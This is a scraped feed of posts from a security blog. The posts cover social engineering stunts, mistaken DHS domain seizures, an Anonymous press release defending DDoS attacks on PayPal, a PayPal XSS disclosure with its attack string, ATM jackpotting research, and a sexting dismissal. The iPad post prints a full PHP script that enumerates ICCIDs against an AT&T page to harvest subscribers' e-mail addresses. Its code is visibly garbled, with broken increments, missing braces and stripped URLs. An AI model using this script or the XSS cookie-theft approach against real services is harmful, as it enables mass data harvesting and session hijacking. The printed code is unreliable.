Praetorian Prefect "Information Security, a little slower...a little deeper" Mon, 23 Mar 2015 03:40:55 +0000 en-US hourly 1 Jimmy Kimmel Gets your Password Sun, 18 Jan 2015 02:46:20 +0000 It didn’t take a whole lot of social engineering for people to give up their passwords: ask them what the password consists of (like it’s my cat’s name and birthday), ask the cat’s name, ask a deflecting question, then ask for the birthday.

A Superbowl Wifi Problem Sun, 02 Feb 2014 05:21:00 +0000 It’s an annual puff piece, whoever is in charge of security at the Super Bowl appears on the news in front of some barrier or computer screen, talking about the number of security guards, guard dogs, or whatever else passes as some grand measure of the ‘amount’ of security being applied.

And as with Super Bowl XLVII when two students just walked right in to the game simply by acting like they belonged, a news feature on Super Bowl XLVIII shows why bragging about your security can backfire:


Yup, that’s Marko’s wifi (wireless network) password in the corner of the screen on the monitor, complete with clear text password for those who don’t want to bother to break it.

Two Jokers Social Engineer their way into the Superbowl Sun, 10 Feb 2013 05:29:18 +0000 Sneaking in near press/employee access points without going thru them, zigzagging through corridors, and once carrying a box so someone opens a door for them, two jokers from Savannah State University social engineer their way into Super Bowl XLVII for the most part simply by looking like they belong.

DHS incorrectly associates 84,000 web sites with child pornography Thu, 17 Feb 2011 03:36:01 +0000 On February 15th a joint project of the Department of Homeland Security Immigrations and Customs Enforcement (ICE) and the Department of Justice termed “Operation Protect Our Children” confidently announced the seizure of ten domain names involved in the advertisement and distribution of child pornography. What they failed to mention was that they also knocked out a popular shared domain by mistake, resulting in, according to TorrentFreak, some 84,000 web sites being taken down and redirected to a banner mentioning child pornography.

Free DNS is a service that provides free DNS hosting, subdomain, and domain hosting among other services. The most popular subdomain offered by the service,, was accidentally caught up in the ICE sweep of domains taken down.


That left legitimate sites such as redirecting to an ICE web page with this banner, telling visitors “Advertisement, distribution, transportation, receipt, and possession of child pornography constitute federal crimes that carry penalties for first time offenders of up to 30 years in federal prison, a $250,000 fine, forfeiture and restitution”:


ICE is able to force this by first getting a District Court judge to sign off on a seizure warrant, and then having the domain registrars re-point the domains to their server hosting the warning banner. At 7:07 on the 12th, the following message was posted by Free DNS after realizing what happened:


Operation In Our Sites
ICE launched their initial endeavor in domain seizures last year under “Operation In Our Sites”, aimed at seizing the domain names of those who infringe on copyrights. Legitimate criticisms of these seizure tactics included targeting web sites that claimed (with paperwork) they were not actually infringing on copyrights and investigations conducted by agents without adequate training or experience. For example, ARS Technica noted one definition from an affidavit provided by an ICE agent that read as follows: “A Bit torrent (referred to in short as ‘torrent’ or ‘torrent file’) is a files distribution system used for transferring files across a network of people.” The lack of technical understanding present in an investigator who is then providing direct input into which domains will be taken down is of concern.

Site owners in this most recent case were presented with the unenviable task of explaining to visitors that they had no affiliation with child pornography. Since these are personal web sites, blogs, and small businesses, this is material to some of the site owners.

This screw up in a well intentioned, but overreaching and ham fisted, government legal action on the Internet comes at a time when legislation requesting further capabilities, such as an “Internet Kill Switch”, is being discussed. Such screw ups, and glossing over them in reporting on the project, do not serve to strengthen ICE’s ability to be successful in future enforcement actions on what is the very serious problem of dissemination of child pornographic material on the Internet.

Colbert Explains Cyberwar Thu, 16 Dec 2010 03:32:15 +0000 stephencolbert-150x150

On the Colbert Report, host Stephen Colbert provided some background on “the First Great Cyberwar” as the hacktivist collective Anonymous has dubbed it, the “Defend Assange” sub-mission of Operation Payback. Operation Payback started as a fight against anti-piracy measures, but has moved to attacking web sites seen to be impeding Wikileaks in its mission to release diplomatic cables via distributed denial of service (DDoS) attacks. This includes sites that have frozen donations to Wikipedia like PayPal or Mastercard and the web sites of law enforcement and politicians either acting against or speaking out against Wikileaks or Anonymous itself.

“America is at Cyberwar, and lolcats says ‘I can has WMD’s?’” -Stephen Colbert

His guest in explaining the problem, Omar Wasow, presented himself well. Wasow is apparently best known from appearances on the Oprah Winfrey show, where he explained aspects of the Internet.

“Time’s person of the year is Mark Zuckerberg. Sorry Julian Assange, I guess you didn’t violate enough people’s privacy.” – Stephen Colbert

I just wish it had been an actual information security expert on the show. Wasow mentioned many of the right examples (the Gawker breach from earlier this week, DDoS attacks on Georgia) but forgot to mention Colbert’s own human distributed denial of service (DDoS) on Conservapedia.

Anonymous Releases Very Unanonymous Press Release Fri, 10 Dec 2010 06:04:07 +0000 Today, December 10th, Anonymous, an Internet gathering, released a press release which you can read below. In it, a description is provided of what Anonymous is about, what Operation Payback is, and where the media is getting it wrong. Also in it, its author forgot to remove his name in the pdf’s Meta information.


Document Properties
Um, Alex Tapanaris…?


Full Press Release Text

ANON OPS: A Press Release December 10, 2010

Who is Anonymous In their most recent public statement, WikiLeaks is the only group of people to identify Anonymous correctly. Anonymous is not a group, but rather an Internet gathering.

Both Anonymous and the media that is covering it are aware of the percieved dissent between individuals in the gathering. This does not, however, mean that the command structure of Anonymous is failing for a simple reason: Anonymous has a very loose and decentralized command structure that operates on ideas rather than directives.

We do not believe that a similar movement exists in the world today and as such we have to learn by trial and error. We are now in the process of better communicating some core values to the individual atoms that comprise Anonymous – we also want to take this opportunity to communicate a message to the media, so that the average Internet Citizen can get to know who we are and what we represent.

Anonymous is not a group of hackers. We are average Interent Citizens ourselves and our motivation is a collective sense of being fed up with all the minor and major injustices we witness every day.

We do not want to steal your personal information or credit card numbers. We also do not seek to attack critical infrastructure of companies such as Mastercard, Visa, PayPal or Amazon. Our current goal is to raise awareness about WikiLeaks and the underhanded methods employed by the above companies to impair WikiLeaks’ ability to function.

What is Operation: Payback As stated above, the point of Operation: Payback was never to target critical infrastructure of any of the companies or organizations affected. Rather than doing that, we focused on their corporate websites, which is to say, their online “public face”. It is a symbolic action – as blogger and academic Evgeny Morozov put it, a legitimate expression of dissent.

The background to the attacks on PayPal and the calls to attack Amazon, which was until recently WikiLeaks’ DNS provider, was one of the first companies to drop support for WikiLeaks. On December 9th, reported that were hosting the recently leaked diplomatic cables in e-book form. ( has since ceased selling the bundle of the diplomatic cables.)

After this piece of news circulated, parts of Anonymous on Twitter asked for to be targetted. The attack never occured.

While it is indeed possible that Anonymous may not have been able to take down in a DDoS attack, this is not the only reason the attack never occured. After the attack was so advertised in the media, we felt that it would affect people such as consumers in a negative way and make them feel threatened by Anonymous. Simply put, attacking a major online retailer when people are buying presents for their loved ones, would be in bad taste.

The continuing attacks on PayPal are already tested and preferable: while not damaging their ability to process payments, they are successful in slowing their network down just enough for people to notice and thus, we achieve our goal of raising awareness.

Related Coverage

Paypal Sender Country XSS Wed, 06 Oct 2010 06:18:02 +0000 A new XSS vulnerability was identified on earlier today, found by d3v1l and disclosed on both Security-Shell and XSSed. The problem is with the parameter sender_country in a transaction called nvpsm. NVP is Paypal’s API for Merchants to use when interacting with the Paypal web site, it stands for Name-Value Pair. SM is short for ‘send money’. A problem such as this can be used to capture a user’s session (essentially log in as that user) and perform privileged actions (money transfers) as that user, as well as send a user a valid Paypal URL but then redirect them to a malicious third party site (phishing, malware, etc.).

Attack String
The following is provided as example in the posts mentioned earlier:¤cy_code=USD&sender_country=">XSS PAYLOAD

Which results in:

Javascript injected into the name value pair of sender country is reflected on the resulting page.

Javascript injected into the name value pair of sender country is reflected on the resulting page.

Paypal is reflecting the supplied script in the error message they are displaying, as seen in the HTML source of the page:

Error COWException: invalid country "">XSS PAYLOAD"

Rather then display an alert box, an actual attacker would either redirect the user as shown below, or capture and send their session cookie (a piece of text the browser stores temporarily to identify a user’s logged in session) to a third party web site.


Session Cookie¤cy_code=USD&sender_country=">

Same javascript alert, but displaying all of the user's cookies under the PayPal domain.

Same javascript alert, but displaying all of the user’s cookies under the PayPal domain.

XSS at a High Level
While the definition is ever expanding, XSS attacks are generally considered a type of injection problem where malicious input is injected into an otherwise trusted web page causing an unexpected behavior such as sending data to or from an unknown third party web site (cross site). Because the script is being run in the context of the trusted web site, it has access to cookies such as session tokens, as well as any other user information available within the security context of that web site. XSS vulnerabilities are somewhat common in web applications and will occur unfettered wherever untrusted input is not validated by the web application or encoded before output back to the user.

The San Jose based company is owned by eBay and has more than 78 million customer accounts. As such the service is used to clear many of the transactions on the popular auction site. The service allows users to send money without needing to share financial information, a key enabler for sending and receiving money from third parties on the Internet. They are in some 190 markets around the world and can work with 19 different currencies.

In 2008 roughly $60 billion dollars moved through Paypal’s systems.

Paypal does make available additional authentication protection in the form of a one time password token called a ’security key’ by them (similar to the ones made popular by RSA). The token costs five dollars and is available to residents of Australia, Germany, Canada, the United Kingdom and the United States. Paypal however allows a bypass of this hard token by allowing the user to enter further information such as credit card or bank number, severely impacting its effectiveness as a security measure.

Further authentication “on the front door” of the web site (the login screen) does not prevent a user session from being hijacked after authentication as is possible in a cross site scripting attack like this one.

It is worth it to note that PayPal is PCI compliant, being subject to quarterly vulnerability scans, as stated on their site.

Users have the ability to go through a process to apply for a refund from PayPal if their account is broken into, but this is not always a clean process. A site should almost never reflect (redisplay) input received from an untrusted source (“the user”), which in this case is the browser, without escaping the output. PayPal has had similar problems with cross site scripting in the past, including an incident back in March. While XSS attacks can be downplayed, a site such as PayPal that performs money transfers (for users of eBay it is basically the only way to send and receive payment) usually has to address these problems quickly. A more comprehensive approach (a shared function that encodes all output originating from untrusted input on the site) is something they could start looking towards to protect their users.

Turning an ATM into a Slot Machine Wed, 28 Jul 2010 06:40:51 +0000 Security researcher Barnaby Jack, currently at IOActive but a veteran of Foundstone, eEye, and Juniper with almost ten years in the industry, has demonstrated two exploit methods for ATM’s (Automated Teller Machines) in a presentation that is thus far the talk of the Black Hat 2010 conference. In a discussion originally slated for last year before it was muffled by Juniper based on the concerns of “an affected ATM vendor”, Jack demonstrates what he calls jackpotting an ATM.

Here’s the ATM “jackpot” (music playing, money flying out, word ‘Jackpot’ displayed on the console):

The Attack
The attack was employed using two custom tools Jack developed: Scrooge, an ATM firmware rootkit (malicious software that conceals itself at the level of interface between software and hardware) and Dilinger (named for the famous bank robber), a remote ATM attack tool that keeps track of compromised machines and stores the data stolen from people who use the machines. The first exploit involved unlocking a panel on the ATM and inserting a USB key that overwrites the machine’s native firmware with the aforementioned rootkit, taking control of the ATM.

atm_openTo perform the research, Jack acquired physical ATM machines, attached a debugger to the ATM motherboard, and proceeded to reverse engineer the machine’s firmware. He then developed a replacement version (the aforementioned Scrooge software). Firmware typically refers to the small footprint of code (programs, data structures) that provide internal control of electronic devices. In other words, think the low level operations of any electronic device.

In the models Jack tested he was able to, after accessing the machine’s USB ports with a master key purchased online, perform a replacement of the firmware with his rootkit version. The ATM’s include the ability to do this so that firmware updates can be made by those performing maintenance on the ATM. However, there is no integrity check to ensure that the code update is coming from a trusted source.

The keys themselves for the cabinets are not hard to acquire.

In response ATM vendors have created a new version of the firmware requiring future updates have a digital signature (essentially a shared secret between the machine and the author of code for that machine to ensure the integrity of the code update). Doing this would help to prevent the type of rogue update via USB Jack performed, as long as the signing keys are kept secret.

While Jack wouldn’t reveal the names of the ATM vendors whose devices he compromised (they are reported to be Triton and Tranax machines), he has noted that every ATM he has tested he has compromised, intimating attacks on multiple machines are possible because of similarities in the way generic ATM machines are made. He did note the external limitations of his research, citing the fact that there are only so many ATM’s you can put in an apartment before “your girlfriend gets mad”.

Jack actually told the delivery man who brought the ATM’s that he was getting them because he wanted to avoid bank withdrawal fees.

Remote Attack
A remote attack was also demonstrated over Wifi, but many of the details have not yet been released. Jack found a way ,testing on his own machines, to bypass the remote authentication system of the ATM so that the same homemade rootkit, Scrooge, could be installed. This essentially provides access to an ATM via an Internet connection allowing for attack results such as the ability to record card and pin numbers on entry and sending them to a remote attacker). Such vulnerable ATM’s could be located with a war dialing tool, calling thousands of phone numbers until a vulnerable machine responds via modem, a technique already in play by criminals.

“Sometimes you have to demo a threat to spark a solution,”
Barnaby Jack

The image is a resonant and powerful image of insecurity, we have here a demonstrated attack that allows you to spew money out of an ATM in a few seconds, and a second that doesn’t even require physical access to the machine. At this point, the response time frame from ATM vendors as well as the vulnerability demonstrated via USB are bordering on negligence, a master key that is readily available and USB based firmware updates without any signing mechanism to ensure that it is an ‘approved’ update.

We have here, after all, a device whose sole purpose is to dispense cash.

Last year an ATM vendor got the talk pulled from BlackHat by pressuring Jack’s employer, Juniper Networks, despite having seven months of notification from Jack to arrive at some sort of response before the scheduled talk. Given we are now some one and a half years from notification, and given the quantity and dispersal of ATM’s out there, the vulnerabilities demonstrated are likely still viable.

114,000 iPad Owners: The Script that Harvested Their E-mail Addresses Wed, 09 Jun 2010 07:15:04 +0000 Here is the script referenced in the Gawker story from earlier that describes how a number of early iPad 3G subscribers, including names like Harvey Weinstein, Michael Bloomberg, Diane Sawyer, and Rahm Emanuel had their e-mails revealed via a poorly designed web application hosted by AT&T.

Goatse Security, named for the famous Internet shock image, wrote the script to harvest e-mail addresses by providing ICC-ID numbers (integrated circuit card identifier, a number that associates a SIM card with a subscriber) and parsing the returned e-mail address.

High profile users from the list of harvested e-mail addresses.

High profile users from the list of harvested e-mail addresses.

After speaking with Goatse Security member Weev, he was kind enough to share the script:

// iPad 3G Account Slurper
// Usage: ./ipadump.php ICCID-base count
// (The script generates the final checkdigit to produce ICCIDs from the entered base)
$useragent="Mozilla/5.0 (iPad)"; //Spoof as iPad
$ICCIDroot = $_SERVER['argv'][1];
$ICCIDcount = $_SERVER['argv'][2];
function genluhn($number){ //Crappy home-made Luhn checkdigit generator
$i = strlen($number)-1;
do {
$array[] = $number[$i];
} while ($i > -1);
$i = 0;
foreach ($array as $digit) {
if (!($i & 1)){
$digit = $digit * 2;
if ($digit >= 10) {
$digit = $digit - 9;
$total = $digit;
$i ;
$luhn = 10 - ($total % 10);
if ($luhn == 10) $luhn=0;
return $luhn;
while (1) { //Continue FOREVER
$ch = curl_init(); //Set up cURL
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); //Since theres a lot of redirection
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies"); //See later
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //Returns any and all data
$ICCID = $ICCIDroot.genluhn(strval($ICCIDroot)); //Generate checkdigit and attach it to
curl_setopt($ch, CURLOPT_URL, "".strval($ICCID)."&IMEI=0");
$output = curl_exec($ch); //Load first page with ICCID
curl_setopt($ch, CURLOPT_URL, "");
$output = curl_exec($ch); //Now load page that is normally redirected with JavaScript.
cURL is nice and passes the previously GET'd info
//print $output; //Prints HTML result
if (!($counter % 50)) echo "-".strval($ICCID)."-\n"; //Prints ICCID every 50 counts just
to keep track of how far the script has gotten
//Parse output. Terribly sloppy
if (preg_match("/<title>Error<\/title>/", $output, $match)) {
preg_match("/<div class=\"info-container\">(.*)<br>(.*)<br>/msU", $output,
$match[0] = preg_replace("/<div class=\"info-container\">\n\s\s /","",$match[0]);
$match[0] = preg_replace("/<\/b><br>/", "<\/b> <br>", $match[0]); //Because I
want space between the period and the next sentence, dammit
$errnum = strip_tags($match[0]);
$status = "Error! ".$errnum; //Return specific error message
} else if (preg_match("<input id=\"email\" name=\"email\" type=\"email\"
placeholder=\"Required\" value=\".*\@.*\" autocapitalization=\"off\" autocorrect=\"off\">",
$output, $match)) {
$match[0] = preg_replace("/input id=\"email\" name=\"email\" type=\"email\"
placeholder=\"Required\" value=\"/","",$match[0]);
$status = preg_replace("/\" autocapitalization=\"off\" autocorrect=\"off\"/", "",
$match[0]); //Return email address
} else {
$status = "Inactive"; //Assume SIM is inactive if nothing tells us otherwise. Bad
logic, will fix.
if ($status != "Inactive") echo strval($ICCID)." : ".$status."\n"; //Print ICCID with error
message or email address. Can print if ICCID is inactive, but it makes for a long, redundant log.
if ($counter == $ICCIDcount) exit;
$ICCIDroot ; //step ICCID
$counter ; //step loop counter

There are probably a few things worth pointing out. They had to set the user-agent string to be the iPad as shown:

$useragent="Mozilla/5.0 (iPad)";

The vulnerable URL at was: number here&IMEI=0

And that’s it, an e-mail address gets returned in the successful iterations (active ICCID) and parsed. There’s no complex hack, no real infiltration or passage of an authentication mechanism, and no breach, just a really poorly designed web application that returns e-mail address when ICCID is passed to it.

Thou Shalt Not Send Naked Pictures…To Anyone Ever Wed, 26 May 2010 05:39:22 +0000 MandarinHigh-150x150It’s becoming a familiar story, an angry parent of a student reports finding inappropriate images, self taken naked pictures and videos, on that student’s cell phone. The images and video were sent to the student by a high school football coach. The mother of the student e-mailed the pictures to the administration of the high school, and the coach was promptly fired in disgrace. But this story has an unusual wrinkle: the student is a 20 year-old at the University of Central Florida, the girlfriend of 32 year-old Mandarin High School football coach Jason Robinson.

Upon finding the pictures, the mother of Jason Robinson’s college age girlfriend fired the images off to the administration at the High School employing this coach. The administration reacted by terminating Robinson, who being within the first three years of his contract there was essentially the equivalent of an “at-will” employee.

The high school principal, Dr. Donna Richardson, fired off the following letter to the coach:

“Effective today you have been reassigned to Bulls Bay for the remainder of this school year. You are not to come back onto our campus, and we will make arrangements to get any of your personal belongings to you.

You are also being non-reappointed for the next school year. It is regretful it had to come to this, but I believe you understand the situation.”

“We hold our teachers to a higher standard. They are in front of our students. They’re talking with our students. They’re teaching our students how to become good characters”

Jason Robinson

So we are left with an ‘at will’ employee, who can be dismissed for any reason, being dismissed for showing a lack of sound judgment and a potential violation of a policy (which for whatever reason couldn’t be located in time to include in the letter). From a legal standpoint, the dismissal may be on solid enough ground.


The incident is problematic on a number of fronts though. As soon as an employing organization begins to pass judgment on the private, non-criminal, non-disallowed by policy, actions of two consenting adults, they open themselves up in an inappropriate role as a moral arbiter over their teachers and staff. The mother’s actions were largely inappropriate in the absence of a crime or high school policy violation regarding relationships between teachers and staff. There has been no indication yet that this relationship started when the girlfriend was a high school student herself. But since you can’t control parents, the high school board, a group of people, owed it to all involved to display a cooler head.

Robinson is claiming this incident has ruined his reputation, and is suing the parents of his 20 year old girlfriend for violating his privacy by looking at the material. It certainly does affect his future prospects in working as a high school football coach to be so publicly dismissed.

A sister of the girlfriend does attend high school at Mandarin also, probably another reason this should have been handled much more quietly, as her life must be a joy right now.

One Wrinkle Though
There is one awkward little wrinkle to the whole episode which may make the school board right (but which throws into question why they wouldn’t comment further to defend their position). There is an allegation that the coach used a school computer to send the images. If that is the case, a policy prohibiting using school equipment to view or send pornography should both be in place and apply (minus the publicity and ‘shaming’ e-mail).


So why isn’t that being included in the school’s response to the case? Either because it isn’t true, or because they haven’t conducted a responsible forensics investigation to back up the allegation. To fire someone so publicly without having this was a mistake. Administrative leave, strengthening the case via proper computer forensics, and then having a full story to go forward with is the correct way to go, not an e-mail sent in haste from the principle’s computer.

According to most followup commentary, the “sent from a school computer” piece likely is not true anyway.

Basically the act of sending a sexually explicit photograph or message with mobile phones as the communication device. The name derives from a combination (or portmanteau for those who want to learn a new word) of the words sex and texting.

The first well known reference to the word is a 2005 article in the British Sunday Telegraph Magazine. In a survey conducted by Cosmogirl, 20% of teens and 33% of young adults indicated they had sent nude or semi-nude (big difference) pictures of themselves via electronic communications. Some 39% of teens and 59% of young adults had said they sent sexually explicit messages.

The Cosmogirl results have been thrown into question however (surveys always are); at least one sociologist, C.J. Pascoe, an assistant professor at Colorado College, completed a three year study interviewing 80 teenagers and found no evidence of truly explicit text or photographs sent via mobile devices.

From personal experience, students are certainly sending and posting information that their parents and other adults would note is probably a mistake to preserve electronically and share. Campaigns, such as the James Lipton campaign we posted about earlier, Don’t Tweet Your Junk, are largely a reaction to this problem.

So there is an issue here that should not be ignored, one that naturally followed the increasing capabilities of cell phones, the decreasing costs, and the result that more young people than ever have sophisticated access to communications technology (something their parents did not by and large have). That said, hyping the numbers by suggesting that 2 out of every 10 teens are sending naked pictures of themselves via their phones is unnecessarily alarmist.

The other larger problem of overreaction is overzealous prosecution of teenagers under child pornography laws which were certainly not codified to cover teenagers e-mailing photographs to each other. Further, the classification of said teenagers or young adults as sex offenders serves only to weaken the notification requirements under Meghan’s Law, designed to protect youth against real sex predators.

I don’t understand the proclivity in the number of people sending naked pictures of their junk to other people. Maybe if doing so will result in Paris Hilton like publicity, but for most of us photographing our nether regions should be grounds for having our heads examined. That said, what we have here is two consenting adults sending content between each other. It was no more the high school’s business than it was that of the mother, unless a school computer was used.

One could make the loose case that the Mother of a 20 year-old might have the moral authority to snoop to try to keep her daughter safe (we don’t really think so at 20, but we could see someone saying that). But sending the pictures on to the high school administration rather than handing this as a private family member shows terrible judgment on the mother’s part. But parents can’t be controlled, the school had to realize a story as salacious as this would spawn media coverage, and should have had their act in order before reacting. If they have nothing, no evidence that this relationship started when the girl was underage or in high school, no use of a school computer via evidence gathered in a forensically sound manner, then this school board has made a mistake.

Or as Principal Richardson defined the school’s mission: “They’re teaching our students how to become good characters”. They’re acting like characters all right, so far anyway.